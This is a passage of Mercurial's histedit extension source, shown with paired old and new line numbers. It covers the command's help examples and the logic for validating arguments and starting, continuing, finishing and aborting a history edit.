1790 - Use --outgoing -- it will be the first linear changeset not
1795 included in destination. (See :hg:`help config.paths.default-push`)
1791 included in destination. (See :hg:`help config.paths.default-push`)
1796
1792
1797 - Otherwise, the value from the "histedit.defaultrev" config option
1793 - Otherwise, the value from the "histedit.defaultrev" config option
1798 is used as a revset to select the base revision when ANCESTOR is not
1794 is used as a revset to select the base revision when ANCESTOR is not
1799 specified. The first revision returned by the revset is used. By
1795 specified. The first revision returned by the revset is used. By
1800 default, this selects the editable history that is unique to the
1796 default, this selects the editable history that is unique to the
1801 ancestry of the working directory.
1797 ancestry of the working directory.
1802
1798
1803 .. container:: verbose
1799 .. container:: verbose
1804
1800
1805 If you use --outgoing, this command will abort if there are ambiguous
1801 If you use --outgoing, this command will abort if there are ambiguous
1806 outgoing revisions. For example, if there are multiple branches
1802 outgoing revisions. For example, if there are multiple branches
1807 containing outgoing revisions.
1803 containing outgoing revisions.
1808
1804
1809 Use "min(outgoing() and ::.)" or similar revset specification
1805 Use "min(outgoing() and ::.)" or similar revset specification
1810 instead of --outgoing to specify edit target revision exactly in
1806 instead of --outgoing to specify edit target revision exactly in
1811 such ambiguous situation. See :hg:`help revsets` for detail about
1807 such ambiguous situation. See :hg:`help revsets` for detail about
1812 selecting revisions.
1808 selecting revisions.
1813
1809
1814 .. container:: verbose
1810 .. container:: verbose
1815
1811
1816 Examples:
1812 Examples:
1817
1813
1818 - A number of changes have been made.
1814 - A number of changes have been made.
1819 Revision 3 is no longer needed.
1815 Revision 3 is no longer needed.
1820
1816
1821 Start history editing from revision 3::
1817 Start history editing from revision 3::
1822
1818
1823 hg histedit -r 3
1819 hg histedit -r 3
1824
1820
1825 An editor opens, containing the list of revisions,
1821 An editor opens, containing the list of revisions,
1826 with specific actions specified::
1822 with specific actions specified::
1827
1823
1828 pick 5339bf82f0ca 3 Zworgle the foobar
1824 pick 5339bf82f0ca 3 Zworgle the foobar
1829 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1825 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1830 pick 0a9639fcda9d 5 Morgify the cromulancy
1826 pick 0a9639fcda9d 5 Morgify the cromulancy
1831
1827
1832 Additional information about the possible actions
1828 Additional information about the possible actions
1833 to take appears below the list of revisions.
1829 to take appears below the list of revisions.
1834
1830
1835 To remove revision 3 from the history,
1831 To remove revision 3 from the history,
1836 its action (at the beginning of the relevant line)
1832 its action (at the beginning of the relevant line)
1837 is changed to 'drop'::
1833 is changed to 'drop'::
1838
1834
1839 drop 5339bf82f0ca 3 Zworgle the foobar
1835 drop 5339bf82f0ca 3 Zworgle the foobar
1840 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1836 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1841 pick 0a9639fcda9d 5 Morgify the cromulancy
1837 pick 0a9639fcda9d 5 Morgify the cromulancy
1842
1838
1843 - A number of changes have been made.
1839 - A number of changes have been made.
1844 Revision 2 and 4 need to be swapped.
1840 Revision 2 and 4 need to be swapped.
1845
1841
1846 Start history editing from revision 2::
1842 Start history editing from revision 2::
1847
1843
1848 hg histedit -r 2
1844 hg histedit -r 2
1849
1845
1850 An editor opens, containing the list of revisions,
1846 An editor opens, containing the list of revisions,
1851 with specific actions specified::
1847 with specific actions specified::
1852
1848
1853 pick 252a1af424ad 2 Blorb a morgwazzle
1849 pick 252a1af424ad 2 Blorb a morgwazzle
1854 pick 5339bf82f0ca 3 Zworgle the foobar
1850 pick 5339bf82f0ca 3 Zworgle the foobar
1855 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1851 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1856
1852
1857 To swap revision 2 and 4, its lines are swapped
1853 To swap revision 2 and 4, its lines are swapped
1858 in the editor::
1854 in the editor::
1859
1855
1860 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1856 pick 8ef592ce7cc4 4 Bedazzle the zerlog
1861 pick 5339bf82f0ca 3 Zworgle the foobar
1857 pick 5339bf82f0ca 3 Zworgle the foobar
1862 pick 252a1af424ad 2 Blorb a morgwazzle
1858 pick 252a1af424ad 2 Blorb a morgwazzle
1863
1859
1864 Returns 0 on success, 1 if user intervention is required (not only
1860 Returns 0 on success, 1 if user intervention is required (not only
1865 for intentional "edit" command, but also for resolving unexpected
1861 for intentional "edit" command, but also for resolving unexpected
1866 conflicts).
1862 conflicts).
1867 """
1863 """
1868 opts = pycompat.byteskwargs(opts)
1864 opts = pycompat.byteskwargs(opts)
1869
1865
1870 # kludge: _chistedit only works for starting an edit, not aborting
1866 # kludge: _chistedit only works for starting an edit, not aborting
1871 # or continuing, so fall back to regular _texthistedit for those
1867 # or continuing, so fall back to regular _texthistedit for those
1872 # operations.
1868 # operations.
1873 if ui.interface(b'histedit') == b'curses' and _getgoal(opts) == goalnew:
1869 if ui.interface(b'histedit') == b'curses' and _getgoal(opts) == goalnew:
1874 return _chistedit(ui, repo, freeargs, opts)
1870 return _chistedit(ui, repo, freeargs, opts)
1875 return _texthistedit(ui, repo, freeargs, opts)
1871 return _texthistedit(ui, repo, freeargs, opts)
1876
1872
1877
1873
1878 def _texthistedit(ui, repo, freeargs, opts):
1874 def _texthistedit(ui, repo, freeargs, opts):
1879 state = histeditstate(repo)
1875 state = histeditstate(repo)
1880 with repo.wlock() as wlock, repo.lock() as lock:
1876 with repo.wlock() as wlock, repo.lock() as lock:
1881 state.wlock = wlock
1877 state.wlock = wlock
1882 state.lock = lock
1878 state.lock = lock
1883 _histedit(ui, repo, state, freeargs, opts)
1879 _histedit(ui, repo, state, freeargs, opts)
1884
1880
1885
1881
1886 goalcontinue = b'continue'
1882 goalcontinue = b'continue'
1887 goalabort = b'abort'
1883 goalabort = b'abort'
1888 goaleditplan = b'edit-plan'
1884 goaleditplan = b'edit-plan'
1889 goalnew = b'new'
1885 goalnew = b'new'
1890
1886
1891
1887
1892 def _getgoal(opts):
1888 def _getgoal(opts):
1893 if opts.get(b'continue'):
1889 if opts.get(b'continue'):
1894 return goalcontinue
1890 return goalcontinue
1895 if opts.get(b'abort'):
1891 if opts.get(b'abort'):
1896 return goalabort
1892 return goalabort
1897 if opts.get(b'edit_plan'):
1893 if opts.get(b'edit_plan'):
1898 return goaleditplan
1894 return goaleditplan
1899 return goalnew
1895 return goalnew
1900
1896
1901
1897
1902 def _readfile(ui, path):
1898 def _readfile(ui, path):
1903 if path == b'-':
1899 if path == b'-':
1904 with ui.timeblockedsection(b'histedit'):
1900 with ui.timeblockedsection(b'histedit'):
1905 return ui.fin.read()
1901 return ui.fin.read()
1906 else:
1902 else:
1907 with open(path, b'rb') as f:
1903 with open(path, b'rb') as f:
1908 return f.read()
1904 return f.read()
1909
1905
1910
1906
1911 def _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs):
1907 def _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs):
1912 # TODO only abort if we try to histedit mq patches, not just
1908 # TODO only abort if we try to histedit mq patches, not just
1913 # blanket if mq patches are applied somewhere
1909 # blanket if mq patches are applied somewhere
1914 mq = getattr(repo, 'mq', None)
1910 mq = getattr(repo, 'mq', None)
1915 if mq and mq.applied:
1911 if mq and mq.applied:
1916 raise error.Abort(_(b'source has mq patches applied'))
1912 raise error.Abort(_(b'source has mq patches applied'))
1917
1913
1918 # basic argument incompatibility processing
1914 # basic argument incompatibility processing
1919 outg = opts.get(b'outgoing')
1915 outg = opts.get(b'outgoing')
1920 editplan = opts.get(b'edit_plan')
1916 editplan = opts.get(b'edit_plan')
1921 abort = opts.get(b'abort')
1917 abort = opts.get(b'abort')
1922 force = opts.get(b'force')
1918 force = opts.get(b'force')
1923 if force and not outg:
1919 if force and not outg:
1924 raise error.Abort(_(b'--force only allowed with --outgoing'))
1920 raise error.Abort(_(b'--force only allowed with --outgoing'))
1925 if goal == b'continue':
1921 if goal == b'continue':
1926 if any((outg, abort, revs, freeargs, rules, editplan)):
1922 if any((outg, abort, revs, freeargs, rules, editplan)):
1927 raise error.Abort(_(b'no arguments allowed with --continue'))
1923 raise error.Abort(_(b'no arguments allowed with --continue'))
1928 elif goal == b'abort':
1924 elif goal == b'abort':
1929 if any((outg, revs, freeargs, rules, editplan)):
1925 if any((outg, revs, freeargs, rules, editplan)):
1930 raise error.Abort(_(b'no arguments allowed with --abort'))
1926 raise error.Abort(_(b'no arguments allowed with --abort'))
1931 elif goal == b'edit-plan':
1927 elif goal == b'edit-plan':
1932 if any((outg, revs, freeargs)):
1928 if any((outg, revs, freeargs)):
1933 raise error.Abort(
1929 raise error.Abort(
1934 _(b'only --commands argument allowed with --edit-plan')
1930 _(b'only --commands argument allowed with --edit-plan')
1935 )
1931 )
1936 else:
1932 else:
1937 if state.inprogress():
1933 if state.inprogress():
1938 raise error.Abort(
1934 raise error.Abort(
1939 _(
1935 _(
1940 b'history edit already in progress, try '
1936 b'history edit already in progress, try '
1941 b'--continue or --abort'
1937 b'--continue or --abort'
1942 )
1938 )
1943 )
1939 )
1944 if outg:
1940 if outg:
1945 if revs:
1941 if revs:
1946 raise error.Abort(_(b'no revisions allowed with --outgoing'))
1942 raise error.Abort(_(b'no revisions allowed with --outgoing'))
1947 if len(freeargs) > 1:
1943 if len(freeargs) > 1:
1948 raise error.Abort(
1944 raise error.Abort(
1949 _(b'only one repo argument allowed with --outgoing')
1945 _(b'only one repo argument allowed with --outgoing')
1950 )
1946 )
1951 else:
1947 else:
1952 revs.extend(freeargs)
1948 revs.extend(freeargs)
1953 if len(revs) == 0:
1949 if len(revs) == 0:
1954 defaultrev = destutil.desthistedit(ui, repo)
1950 defaultrev = destutil.desthistedit(ui, repo)
1955 if defaultrev is not None:
1951 if defaultrev is not None:
1956 revs.append(defaultrev)
1952 revs.append(defaultrev)
1957
1953
1958 if len(revs) != 1:
1954 if len(revs) != 1:
1959 raise error.Abort(
1955 raise error.Abort(
1960 _(b'histedit requires exactly one ancestor revision')
1956 _(b'histedit requires exactly one ancestor revision')
1961 )
1957 )
1962
1958
1963
1959
1964 def _histedit(ui, repo, state, freeargs, opts):
1960 def _histedit(ui, repo, state, freeargs, opts):
1965 fm = ui.formatter(b'histedit', opts)
1961 fm = ui.formatter(b'histedit', opts)
1966 fm.startitem()
1962 fm.startitem()
1967 goal = _getgoal(opts)
1963 goal = _getgoal(opts)
1968 revs = opts.get(b'rev', [])
1964 revs = opts.get(b'rev', [])
1969 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
1965 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
1970 rules = opts.get(b'commands', b'')
1966 rules = opts.get(b'commands', b'')
1971 state.keep = opts.get(b'keep', False)
1967 state.keep = opts.get(b'keep', False)
1972
1968
1973 _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs)
1969 _validateargs(ui, repo, state, freeargs, opts, goal, rules, revs)
1974
1970
1975 hastags = False
1971 hastags = False
1976 if revs:
1972 if revs:
1977 revs = scmutil.revrange(repo, revs)
1973 revs = scmutil.revrange(repo, revs)
1978 ctxs = [repo[rev] for rev in revs]
1974 ctxs = [repo[rev] for rev in revs]
1979 for ctx in ctxs:
1975 for ctx in ctxs:
1980 tags = [tag for tag in ctx.tags() if tag != b'tip']
1976 tags = [tag for tag in ctx.tags() if tag != b'tip']
1981 if not hastags:
1977 if not hastags:
1982 hastags = len(tags)
1978 hastags = len(tags)
1983 if hastags:
1979 if hastags:
1984 if ui.promptchoice(
1980 if ui.promptchoice(
1985 _(
1981 _(
1986 b'warning: tags associated with the given'
1982 b'warning: tags associated with the given'
1987 b' changeset will be lost after histedit.\n'
1983 b' changeset will be lost after histedit.\n'
1988 b'do you want to continue (yN)? $$ &Yes $$ &No'
1984 b'do you want to continue (yN)? $$ &Yes $$ &No'
1989 ),
1985 ),
1990 default=1,
1986 default=1,
1991 ):
1987 ):
1992 raise error.Abort(_(b'histedit cancelled\n'))
1988 raise error.Abort(_(b'histedit cancelled\n'))
1993 # rebuild state
1989 # rebuild state
1994 if goal == goalcontinue:
1990 if goal == goalcontinue:
1995 state.read()
1991 state.read()
1996 state = bootstrapcontinue(ui, state, opts)
1992 state = bootstrapcontinue(ui, state, opts)
1997 elif goal == goaleditplan:
1993 elif goal == goaleditplan:
1998 _edithisteditplan(ui, repo, state, rules)
1994 _edithisteditplan(ui, repo, state, rules)
1999 return
1995 return
2000 elif goal == goalabort:
1996 elif goal == goalabort:
2001 _aborthistedit(ui, repo, state, nobackup=nobackup)
1997 _aborthistedit(ui, repo, state, nobackup=nobackup)
2002 return
1998 return
2003 else:
1999 else:
2004 # goal == goalnew
2000 # goal == goalnew
2005 _newhistedit(ui, repo, state, revs, freeargs, opts)
2001 _newhistedit(ui, repo, state, revs, freeargs, opts)
2006
2002
2007 _continuehistedit(ui, repo, state)
2003 _continuehistedit(ui, repo, state)
2008 _finishhistedit(ui, repo, state, fm)
2004 _finishhistedit(ui, repo, state, fm)
2009 fm.end()
2005 fm.end()
2010
2006
2011
2007
2012 def _continuehistedit(ui, repo, state):
2008 def _continuehistedit(ui, repo, state):
2013 """This function runs after either:
2009 """This function runs after either:
2014 - bootstrapcontinue (if the goal is 'continue')
2010 - bootstrapcontinue (if the goal is 'continue')
2015 - _newhistedit (if the goal is 'new')
2011 - _newhistedit (if the goal is 'new')
2016 """
2012 """
2017 # preprocess rules so that we can hide inner folds from the user
2013 # preprocess rules so that we can hide inner folds from the user
2018 # and only show one editor
2014 # and only show one editor
2019 actions = state.actions[:]
2015 actions = state.actions[:]
2020 for idx, (action, nextact) in enumerate(zip(actions, actions[1:] + [None])):
2016 for idx, (action, nextact) in enumerate(zip(actions, actions[1:] + [None])):
2021 if action.verb == b'fold' and nextact and nextact.verb == b'fold':
2017 if action.verb == b'fold' and nextact and nextact.verb == b'fold':
2022 state.actions[idx].__class__ = _multifold
2018 state.actions[idx].__class__ = _multifold
2023
2019
2024 # Force an initial state file write, so the user can run --abort/continue
2020 # Force an initial state file write, so the user can run --abort/continue
2025 # even if there's an exception before the first transaction serialize.
2021 # even if there's an exception before the first transaction serialize.
2026 state.write()
2022 state.write()
2027
2023
2028 tr = None
2024 tr = None
2029 # Don't use singletransaction by default since it rolls the entire
2025 # Don't use singletransaction by default since it rolls the entire
2030 # transaction back if an unexpected exception happens (like a
2026 # transaction back if an unexpected exception happens (like a
2031 # pretxncommit hook throws, or the user aborts the commit msg editor).
2027 # pretxncommit hook throws, or the user aborts the commit msg editor).
2032 if ui.configbool(b"histedit", b"singletransaction"):
2028 if ui.configbool(b"histedit", b"singletransaction"):
2033 # Don't use a 'with' for the transaction, since actions may close
2029 # Don't use a 'with' for the transaction, since actions may close
2034 # and reopen a transaction. For example, if the action executes an
2030 # and reopen a transaction. For example, if the action executes an
2035 # external process it may choose to commit the transaction first.
2031 # external process it may choose to commit the transaction first.
2036 tr = repo.transaction(b'histedit')
2032 tr = repo.transaction(b'histedit')
2037 progress = ui.makeprogress(
2033 progress = ui.makeprogress(
2038 _(b"editing"), unit=_(b'changes'), total=len(state.actions)
2034 _(b"editing"), unit=_(b'changes'), total=len(state.actions)
2039 )
2035 )
2040 with progress, util.acceptintervention(tr):
2036 with progress, util.acceptintervention(tr):
2041 while state.actions:
2037 while state.actions:
2042 state.write(tr=tr)
2038 state.write(tr=tr)
2043 actobj = state.actions[0]
2039 actobj = state.actions[0]
2044 progress.increment(item=actobj.torule())
2040 progress.increment(item=actobj.torule())
2045 ui.debug(
2041 ui.debug(
2046 b'histedit: processing %s %s\n' % (actobj.verb, actobj.torule())
2042 b'histedit: processing %s %s\n' % (actobj.verb, actobj.torule())
2047 )
2043 )
2048 parentctx, replacement_ = actobj.run()
2044 parentctx, replacement_ = actobj.run()
2049 state.parentctxnode = parentctx.node()
2045 state.parentctxnode = parentctx.node()
2050 state.replacements.extend(replacement_)
2046 state.replacements.extend(replacement_)
2051 state.actions.pop(0)
2047 state.actions.pop(0)
2052
2048
2053 state.write()
2049 state.write()
2054
2050
2055
2051
2056 def _finishhistedit(ui, repo, state, fm):
2052 def _finishhistedit(ui, repo, state, fm):
2057 """This action runs when histedit is finishing its session"""
2053 """This action runs when histedit is finishing its session"""
2058 hg.updaterepo(repo, state.parentctxnode, overwrite=False)
2054 hg.updaterepo(repo, state.parentctxnode, overwrite=False)
2059
2055
2060 mapping, tmpnodes, created, ntm = processreplacement(state)
2056 mapping, tmpnodes, created, ntm = processreplacement(state)
2061 if mapping:
2057 if mapping:
2062 for prec, succs in pycompat.iteritems(mapping):
2058 for prec, succs in pycompat.iteritems(mapping):
2063 if not succs:
2059 if not succs:
2064 ui.debug(b'histedit: %s is dropped\n' % node.short(prec))
2060 ui.debug(b'histedit: %s is dropped\n' % node.short(prec))
2065 else:
2061 else:
2066 ui.debug(
2062 ui.debug(
2067 b'histedit: %s is replaced by %s\n'
2063 b'histedit: %s is replaced by %s\n'
2068 % (node.short(prec), node.short(succs[0]))
2064 % (node.short(prec), node.short(succs[0]))
2069 )
2065 )
2070 if len(succs) > 1:
2066 if len(succs) > 1:
2071 m = b'histedit: %s'
2067 m = b'histedit: %s'
2072 for n in succs[1:]:
2068 for n in succs[1:]:
2073 ui.debug(m % node.short(n))
2069 ui.debug(m % node.short(n))
2074
2070
2075 if not state.keep:
2071 if not state.keep:
2076 if mapping:
2072 if mapping:
2077 movetopmostbookmarks(repo, state.topmost, ntm)
2073 movetopmostbookmarks(repo, state.topmost, ntm)
2078 # TODO update mq state
2074 # TODO update mq state
2079 else:
2075 else:
2080 mapping = {}
2076 mapping = {}
2081
2077
2082 for n in tmpnodes:
2078 for n in tmpnodes:
2083 if n in repo:
2079 if n in repo:
2084 mapping[n] = ()
2080 mapping[n] = ()
2085
2081
2086 # remove entries about unknown nodes
2082 # remove entries about unknown nodes
2087 has_node = repo.unfiltered().changelog.index.has_node
2083 has_node = repo.unfiltered().changelog.index.has_node
2088 mapping = {
2084 mapping = {
2089 k: v
2085 k: v
2090 for k, v in mapping.items()
2086 for k, v in mapping.items()
2091 if has_node(k) and all(has_node(n) for n in v)
2087 if has_node(k) and all(has_node(n) for n in v)
2092 }
2088 }
2093 scmutil.cleanupnodes(repo, mapping, b'histedit')
2089 scmutil.cleanupnodes(repo, mapping, b'histedit')
2094 hf = fm.hexfunc
2090 hf = fm.hexfunc
2095 fl = fm.formatlist
2091 fl = fm.formatlist
2096 fd = fm.formatdict
2092 fd = fm.formatdict
2097 nodechanges = fd(
2093 nodechanges = fd(
2098 {
2094 {
2099 hf(oldn): fl([hf(n) for n in newn], name=b'node')
2095 hf(oldn): fl([hf(n) for n in newn], name=b'node')
2100 for oldn, newn in pycompat.iteritems(mapping)
2096 for oldn, newn in pycompat.iteritems(mapping)
2101 },
2097 },
2102 key=b"oldnode",
2098 key=b"oldnode",
2103 value=b"newnodes",
2099 value=b"newnodes",
2104 )
2100 )
2105 fm.data(nodechanges=nodechanges)
2101 fm.data(nodechanges=nodechanges)
2106
2102
2107 state.clear()
2103 state.clear()
2108 if os.path.exists(repo.sjoin(b'undo')):
2104 if os.path.exists(repo.sjoin(b'undo')):
2109 os.unlink(repo.sjoin(b'undo'))
2105 os.unlink(repo.sjoin(b'undo'))
2110 if repo.vfs.exists(b'histedit-last-edit.txt'):
2106 if repo.vfs.exists(b'histedit-last-edit.txt'):
2111 repo.vfs.unlink(b'histedit-last-edit.txt')
2107 repo.vfs.unlink(b'histedit-last-edit.txt')
2112
2108
2113
2109
2114 def _aborthistedit(ui, repo, state, nobackup=False):
2110 def _aborthistedit(ui, repo, state, nobackup=False):
2115 try:
2111 try:
2116 state.read()
2112 state.read()
2117 __, leafs, tmpnodes, __ = processreplacement(state)
2113 __, leafs, tmpnodes, __ = processreplacement(state)
2118 ui.debug(b'restore wc to old parent %s\n' % node.short(state.topmost))
2114 ui.debug(b'restore wc to old parent %s\n' % node.short(state.topmost))
2119
2115
2120 # Recover our old commits if necessary
2116 # Recover our old commits if necessary
2121 if not state.topmost in repo and state.backupfile:
2117 if not state.topmost in repo and state.backupfile:
2122 backupfile = repo.vfs.join(state.backupfile)
2118 backupfile = repo.vfs.join(state.backupfile)
2123 f = hg.openpath(ui, backupfile)
2119 f = hg.openpath(ui, backupfile)
2124 gen = exchange.readbundle(ui, f, backupfile)
2120 gen = exchange.readbundle(ui, f, backupfile)
2125 with repo.transaction(b'histedit.abort') as tr:
2121 with repo.transaction(b'histedit.abort') as tr:
2126 bundle2.applybundle(
2122 bundle2.applybundle(
2127 repo,
2123 repo,
2128 gen,
2124 gen,
2129 tr,
2125 tr,
2130 source=b'histedit',
2126 source=b'histedit',
2131 url=b'bundle:' + backupfile,
2127 url=b'bundle:' + backupfile,
2132 )
2128 )
2133
2129
2134 os.remove(backupfile)
2130 os.remove(backupfile)
2135
2131
2136 # check whether we should update away
2132 # check whether we should update away
2137 if repo.unfiltered().revs(
2133 if repo.unfiltered().revs(
2138 b'parents() and (%n or %ln::)',
2134 b'parents() and (%n or %ln::)',
2139 state.parentctxnode,
2135 state.parentctxnode,
2140 leafs | tmpnodes,
2136 leafs | tmpnodes,
2141 ):
2137 ):
2142 hg.clean(repo, state.topmost, show_stats=True, quietempty=True)
2138 hg.clean(repo, state.topmost, show_stats=True, quietempty=True)
2143 cleanupnode(ui, repo, tmpnodes, nobackup=nobackup)
2139 cleanupnode(ui, repo, tmpnodes, nobackup=nobackup)
2144 cleanupnode(ui, repo, leafs, nobackup=nobackup)
2140 cleanupnode(ui, repo, leafs, nobackup=nobackup)
2145 except Exception:
2141 except Exception:
2146 if state.inprogress():
2142 if state.inprogress():
2147 ui.warn(
2143 ui.warn(
2148 _(
2144 _(
2149 b'warning: encountered an exception during histedit '
2145 b'warning: encountered an exception during histedit '
2150 b'--abort; the repository may not have been completely '
2146 b'--abort; the repository may not have been completely '
2151 b'cleaned up\n'
2147 b'cleaned up\n'
2152 )
2148 )
2153 )
2149 )
2154 raise
2150 raise
2155 finally:
2151 finally:
2156 state.clear()
2152 state.clear()
2157
2153
2158
2154
2159 def hgaborthistedit(ui, repo):
2155 def hgaborthistedit(ui, repo):
2160 state = histeditstate(repo)
2156 state = histeditstate(repo)
2161 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
2157 nobackup = not ui.configbool(b'rewrite', b'backup-bundle')
2162 with repo.wlock() as wlock, repo.lock() as lock:
2158 with repo.wlock() as wlock, repo.lock() as lock:
2163 state.wlock = wlock
2159 state.wlock = wlock
2164 state.lock = lock
2160 state.lock = lock
2165 _aborthistedit(ui, repo, state, nobackup=nobackup)
2161 _aborthistedit(ui, repo, state, nobackup=nobackup)
2166
2162
2167
2163
2168 def _edithisteditplan(ui, repo, state, rules):
2164 def _edithisteditplan(ui, repo, state, rules):
2169 state.read()
2165 state.read()
2170 if not rules:
2166 if not rules:
2171 comment = geteditcomment(
2167 comment = geteditcomment(
2172 ui, node.short(state.parentctxnode), node.short(state.topmost)
2168 ui, node.short(state.parentctxnode), node.short(state.topmost)
2173 )
2169 )
2174 rules = ruleeditor(repo, ui, state.actions, comment)
2170 rules = ruleeditor(repo, ui, state.actions, comment)
2175 else:
2171 else:
2176 rules = _readfile(ui, rules)
2172 rules = _readfile(ui, rules)
2177 actions = parserules(rules, state)
2173 actions = parserules(rules, state)
2178 ctxs = [repo[act.node] for act in state.actions if act.node]
2174 ctxs = [repo[act.node] for act in state.actions if act.node]
2179 warnverifyactions(ui, repo, actions, state, ctxs)
2175 warnverifyactions(ui, repo, actions, state, ctxs)
2180 state.actions = actions
2176 state.actions = actions
2181 state.write()
2177 state.write()
2182
2178
2183
2179
2184 def _newhistedit(ui, repo, state, revs, freeargs, opts):
2180 def _newhistedit(ui, repo, state, revs, freeargs, opts):
2185 outg = opts.get(b'outgoing')
2181 outg = opts.get(b'outgoing')
2186 rules = opts.get(b'commands', b'')
2182 rules = opts.get(b'commands', b'')
2187 force = opts.get(b'force')
2183 force = opts.get(b'force')
2188
2184
2189 cmdutil.checkunfinished(repo)
2185 cmdutil.checkunfinished(repo)
2190 cmdutil.bailifchanged(repo)
2186 cmdutil.bailifchanged(repo)
2191
2187
2192 topmost = repo.dirstate.p1()
2188 topmost = repo.dirstate.p1()
2193 if outg:
2189 if outg:
2194 if freeargs:
2190 if freeargs:
2195 remote = freeargs[0]
2191 remote = freeargs[0]
2196 else:
2192 else:
2197 remote = None
2193 remote = None
2198 root = findoutgoing(ui, repo, remote, force, opts)
2194 root = findoutgoing(ui, repo, remote, force, opts)
2199 else:
2195 else:
2200 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
2196 rr = list(repo.set(b'roots(%ld)', scmutil.revrange(repo, revs)))
2201 if len(rr) != 1:
2197 if len(rr) != 1:
2202 raise error.Abort(
2198 raise error.Abort(
2203 _(
2199 _(
2204 b'The specified revisions must have '
2200 b'The specified revisions must have '
2205 b'exactly one common root'
2201 b'exactly one common root'
2206 )
2202 )
2207 )
2203 )
2208 root = rr[0].node()
2204 root = rr[0].node()
2209
2205
2210 revs = between(repo, root, topmost, state.keep)
2206 revs = between(repo, root, topmost, state.keep)
2211 if not revs:
2207 if not revs:
2212 raise error.Abort(
2208 raise error.Abort(
2213 _(b'%s is not an ancestor of working directory') % node.short(root)
2209 _(b'%s is not an ancestor of working directory') % node.short(root)
2214 )
2210 )
2215
2211
2216 ctxs = [repo[r] for r in revs]
2212 ctxs = [repo[r] for r in revs]
2217
2213
2218 wctx = repo[None]
2214 wctx = repo[None]
2219 # Please don't ask me why `ancestors` is this value. I figured it
2215 # Please don't ask me why `ancestors` is this value. I figured it
2220 # out with print-debugging, not by actually understanding what the
2216 # out with print-debugging, not by actually understanding what the
2221 # merge code is doing. :(
2217 # merge code is doing. :(
2222 ancs = [repo[b'.']]
2218 ancs = [repo[b'.']]
2223 # Sniff-test to make sure we won't collide with untracked files in
2219 # Sniff-test to make sure we won't collide with untracked files in
2224 # the working directory. If we don't do this, we can get a
2220 # the working directory. If we don't do this, we can get a
2225 # collision after we've started histedit and backing out gets ugly
2221 # collision after we've started histedit and backing out gets ugly
2226 # for everyone, especially the user.
2222 # for everyone, especially the user.
2227 for c in [ctxs[0].p1()] + ctxs:
2223 for c in [ctxs[0].p1()] + ctxs:
2228 try:
2224 try:
2229 mergemod.calculateupdates(
2225 mergemod.calculateupdates(
2230 repo,
2226 repo,
2231 wctx,
2227 wctx,
2232 c,
2228 c,
2233 ancs,
2229 ancs,
2234 # These parameters were determined by print-debugging
2230 # These parameters were determined by print-debugging
2235 # what happens later on inside histedit.
2231 # what happens later on inside histedit.
2236 branchmerge=False,
2232 branchmerge=False,
2237 force=False,
2233 force=False,
2238 acceptremote=False,
2234 acceptremote=False,
2239 followcopies=False,
2235 followcopies=False,
2240 )
2236 )
2241 except error.Abort:
2237 except error.Abort:
2242 raise error.Abort(
2238 raise error.Abort(
2243 _(
2239 _(
2244 b"untracked files in working directory conflict with files in %s"
2240 b"untracked files in working directory conflict with files in %s"
2245 )
2241 )
2246 % c
2242 % c
2247 )
2243 )
2248
2244
2249 if not rules:
2245 if not rules:
2250 comment = geteditcomment(ui, node.short(root), node.short(topmost))
2246 comment = geteditcomment(ui, node.short(root), node.short(topmost))
2251 actions = [pick(state, r) for r in revs]
2247 actions = [pick(state, r) for r in revs]
2252 rules = ruleeditor(repo, ui, actions, comment)
2248 rules = ruleeditor(repo, ui, actions, comment)
2253 else:
2249 else:
2254 rules = _readfile(ui, rules)
2250 rules = _readfile(ui, rules)
2255 actions = parserules(rules, state)
2251 actions = parserules(rules, state)
2256 warnverifyactions(ui, repo, actions, state, ctxs)
2252 warnverifyactions(ui, repo, actions, state, ctxs)
2257
2253
2258 parentctxnode = repo[root].p1().node()
2254 parentctxnode = repo[root].p1().node()
2259
2255
2260 state.parentctxnode = parentctxnode
2256 state.parentctxnode = parentctxnode
2261 state.actions = actions
2257 state.actions = actions
2262 state.topmost = topmost
2258 state.topmost = topmost
2263 state.replacements = []
2259 state.replacements = []
2264
2260
2265 ui.log(
2261 ui.log(
2266 b"histedit",
2262 b"histedit",
2267 b"%d actions to histedit\n",
2263 b"%d actions to histedit\n",
2268 len(actions),
2264 len(actions),
2269 histedit_num_actions=len(actions),
2265 histedit_num_actions=len(actions),
2270 )
2266 )
2271
2267
2272 # Create a backup so we can always abort completely.
2268 # Create a backup so we can always abort completely.
2273 backupfile = None
2269 backupfile = None
2274 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2270 if not obsolete.isenabled(repo, obsolete.createmarkersopt):
2275 backupfile = repair.backupbundle(
2271 backupfile = repair.backupbundle(
2276 repo, [parentctxnode], [topmost], root, b'histedit'
2272 repo, [parentctxnode], [topmost], root, b'histedit'
2277 )
2273 )
2278 state.backupfile = backupfile
2274 state.backupfile = backupfile
2279
2275
2280
2276
2281 def _getsummary(ctx):
2277 def _getsummary(ctx):
2282 # a common pattern is to extract the summary but default to the empty
2278 # a common pattern is to extract the summary but default to the empty
2283 # string
2279 # string
2284 summary = ctx.description() or b''
2280 summary = ctx.description() or b''
2285 if summary:
2281 if summary:
2286 summary = summary.splitlines()[0]
2282 summary = summary.splitlines()[0]
2287 return summary
2283 return summary
2288
2284
2289
2285
2290 def bootstrapcontinue(ui, state, opts):
2286 def bootstrapcontinue(ui, state, opts):
2291 repo = state.repo
2287 repo = state.repo
2292
2288
2293 ms = mergestatemod.mergestate.read(repo)
2289 ms = mergestatemod.mergestate.read(repo)
2294 mergeutil.checkunresolved(ms)
2290 mergeutil.checkunresolved(ms)
2295
2291
2296 if state.actions:
2292 if state.actions:
2297 actobj = state.actions.pop(0)
2293 actobj = state.actions.pop(0)
2298
2294
2299 if _isdirtywc(repo):
2295 if _isdirtywc(repo):
2300 actobj.continuedirty()
2296 actobj.continuedirty()
2301 if _isdirtywc(repo):
2297 if _isdirtywc(repo):
2302 abortdirty()
